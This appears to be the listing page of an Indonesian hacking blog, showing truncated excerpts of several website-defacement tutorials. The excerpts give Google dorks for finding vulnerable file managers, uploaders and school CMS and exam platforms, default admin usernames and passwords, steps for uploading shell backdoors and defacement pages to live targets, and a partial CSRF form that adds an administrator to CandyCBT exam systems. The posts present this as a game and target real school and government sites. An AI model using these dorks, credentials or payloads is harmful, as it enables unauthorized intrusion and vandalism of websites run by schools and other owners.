Postingan

Cara Deface Responsive File Manager + Live Target

Gambar
Yowatsap guys kita bahas lagi cara deface poc RFM atau "Responsive File Manager" lanjut aja ke tutorialnya di sini we ada live target buat kalian belajar guys okeh kita lanjut ke tutorialnya :v


Dork:

inurl:/filemanager/ intext:"dialog.php" inurl:/js/filemanager/ intext:"dialog.php" inurl:/assent/filemanager/ intext:"dialog.php" intext:"File manager" ext:php


pertama kalian dorking seperti biasa guys dorknya dah we siapin tuh di atas

Nahh di situ banyak target yahh guys kalian tinggal pilih aja salah satu target yang ada di situ sehubung gw ada live target gw pake live target aja guys :v

Kalian bisa liat di gambar di atas cara upload sc kalian guys btw ga semua web bisa up sc html/txt yahh :v

Okeh kalian upload sc kalian yang berformat html/txt juga bisa guys kalo udh ke upload nanti ada tanda centang berarti sukses di upload yah guys :v

Nahh kalian tinggal show url tinggal kalian copy terus pastekan di url 

Berhasil yakk gampang kan tapi tak segamp…

cara deface poc php file manger + up shell

Gambar
ukeh guys balik lagi dengan gw Babacang07 we kali ini upload lagi cara deface poc php file manger + up shell mayan lah :v

Kita siapkan bahan dulu guys
- sc depes  - shell backdoor - malkis Kokola biar halal depesnya :v - ketamvanan biar plun webnya
Dork:
intitle:"PHP File Manager" ext:php intitle:"file manager" Intext:php intitle:upload file manager ext:php [User your brain]
Ohh iya kalian harus login dulu di file manager ini guys
User: fm_admin Pass: fm_admin
kita lanjut ke tutorialnya guys capek ngetik bjir :v

pertama kalian harus dorking dulu seperti biasa dorknya udh gw siapin di atas
Nahh kan banyak target tuh kalian tinggal pilih yang vlun nah ciri² yang plun webnya ada page loginnya kek gambar di bawah :v
nahh ini target gw kalian tinggal masukan user & pass yang dah gw sediain di atas

Nahh kalo vln otomatis langsung masuk ke file manager webnya guys bang gimana cara up shell? nahh kalian tinggal klik di pojok kanan atas ada tanda panah ke atas warna biru kalian klik

Nahh …

Cara deface Dorking Uploader + upload shell

Gambar
hello guys kali ini we upload lagi cara deface poc dorking uploader + up shell sebenarnya poc ni dah lama tapi tenang masih ada kok guys kalian hrs pinter kembangin dork biar dapet yang prawan :v
kita lanjut ke tutorialnya kita siapkan bahan-bahan dulu guys biar enak yahkan :v
Dork:
site:com Priv8 Linux #1 SMP
site:com /admin Priv8 #1 SMP
site:com /images Priv8 #1 SMP
site:com Uploader by #1 SMP
site:com /admin Uploader by #1 SMP
inurl:Priv8 Linux #1 SMP site:in
inurl:Priv8 /admin #1 SMP site:in
site:com priv8 Linux #1 SMP  /admin (User your brain)
Bahan-bahan
script depes  shell backdoor malkis Kokola biar halal depesnya :v

pertama-tama kalian dorking kek biasanya guys dorknya yang dah saya sediain di atas
nah kalo kalian nemu web yang ada uploadernya kalian langsung eksekusi guys ett tapi semua web yang ada uploadernya blm tentu bisa di up yah guys
okeh di sini saya berhasil up shell guys dan coba kita buka apakah bisa di akses

Dann bumm berhasil guys langsung di arahkan ke public_html btw  webnya wor…

Cara Deface Priv8 SRC

Gambar
Hello guys dah lama tak upload lagi okeh kali ini saya upload cara deface poc priv8 src sebenarnya poc ini dah lama tapi masih banyak yang bingung juga caranya okeh lanjut ke tutorialnya jomm

kita siapin bahan bahannya dulu guys
- Dork: - inurl:config/config.izo
- intitle:"Priv8 SCR" - "priv8 src config.izo" (Kembangin lagi guys) - Akses: http://target.co.uk/config/tar.tmp - internet - malkis Kokola biar halal :v

Pertama kita dorking dulu menggunakan dork yang dah saya sediakan di atas
Nahh kalo dah kalian pilih salah satu target di atas lalu kalian klik targetnya
Tampilannya seperti ini kalian isi nama Heked by kalian kalo sudah klik Hajar
Nahh kalo udh kalian klik Hajar nanti muncul Done!!! tinggal panggil aja guys  Contoh https//suitelu.gov/config/tar.tmp
Nahh kan udh ada nama yang kalian isi tadi tinggal di mirorin deh di defacer.id

jangan lupa kunjungi juga blog team kami https://phantom-sec1337.blogspot.com/
Heppy deface  thanks to all member PhantomSec1337 Help me share and come…

Deface Default u/p CMS web sekolahku

Gambar
Okeh bro kembali lagi dengan gua Babacang07 kali ini we akan upload cara depes Default u/p CMS web sekolahku okh jngn banyak bcd lesstgoo :)

Bahan² 
1.shell backdoor 2.sc depes lu 3.kopi  4.malkist Kokola biar halal depesnya :v 5.pantang menyerah

Dork:
"Developed by sekolahku.web.id" Copyright © 2014 - 2020 sekolahku.web.id All Rights Reserved
Kembangin lagi bro biar dapet yang fresh
Exploit: https://mantan.com/login
User : administrator Pass : administrator
User : admin Pass  : admin
Laju ke tutorialnya
Seperti biasa kalian dorking dulu pakek dork yang dah we sediain di atas
Nahh habis kalian dorking kalian masukkan Exploit nya di belakang site contoh https:mantan.co.ok/login nahh nanti otomatis langsung di arahkan ke page login

Nahh kalian masukkan user sama pw nya di situ kalo vlun otomatis masuk ke dashboard mimin

Nahh kalo udh masuk ke dashboard mimin terserah kalian webnya mau di apain, cukup segini tutor dari we bro :)


jngn lupa share broh


CandyCBT v2.8.0 r !!!add admin

Gambar
Heyoyo bree bertemu dengan saya lagi kali ini gua upload cara deface candy CBT iya yang biasanya di sebut Computer Basics Test tu loh buat ujian sekolah gak tau gak usah sekolah bree: (admin
Langsung saja ke tutornya
1.Dork:
 ~> "Responsive Image" + "Support" intitle:Login
~> intex support by candy cbt v2.8.0
~> inurl: login CBT site:.sch.id

2.shell banyak di google terserah mau pake yng mana  3.Crsf add mimin
<html> <head></head> <body> <form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post"> <label>nip</label> <input type="text" name="nip" value="123761717" required="true" /> <br> <label>nama</label> <input type="text" name="nama" required="true" /> <br> <label>username</label> <input type="text" name="username" required="true" /> <br> <…

Deface default u/p wordpress

Gambar
Assalamualaikum wr.wbBertemu lagi dengan gw di blog Babacang ge disini bakalan kasih tutor tentang Deface default u/p wordpress caranya ialah dengan mudah sebenarnya ini salah admin wordpress karena kaga di ganti user sama pasnya jadinya gampang di bobol websitenya: v  Ok bree jangan banyak bcd langsung ke tutornya

Bahan-bahan 1.script depes kalian  2.shell Backdoor/mini shell 3.Exploit: wp-login.php 4.malkis Kokola biar halal: v
Dork  intitle:"My Blog My Wordpress blog" intitle: My Blog My wordpress site:  intitle :My blog My wordpress

1.User: admin    Pass: pass
2.User: admin

Deface Poc Cwcontrol Default User/Pass

Gambar
Assalamu'alaikum wr.wb Ok bree kita bahas cara deface poc cwcontrol default user/pass 

Lanjut bree 
Dork:inurl:/cwcontrol            intext:"design by channel wide computer"                                          
Exploit : /cwcontrol
user : admin password : cw774411

Bahan-bahan 1.script depes kalean: v 2.shell backdoor  3.luak white coffee 4.malkis Kokola biar halal: v

Step by step

Pertama kalian dorking pakek dork di atas udah saya siapin bree: v

Nahh kalian tambah Exploit di belakang site terus otomatis ada tempat login.nahh kalian tinggal masukkan user sama pass nya 

Nahh kalo vlun otomatis masuk ke dashboard mimin terserah kalian mau di apakan web tersebut:) 



Okh bree sekian tutornya Jangan lupa share:) Heppy deface  Enjoy deface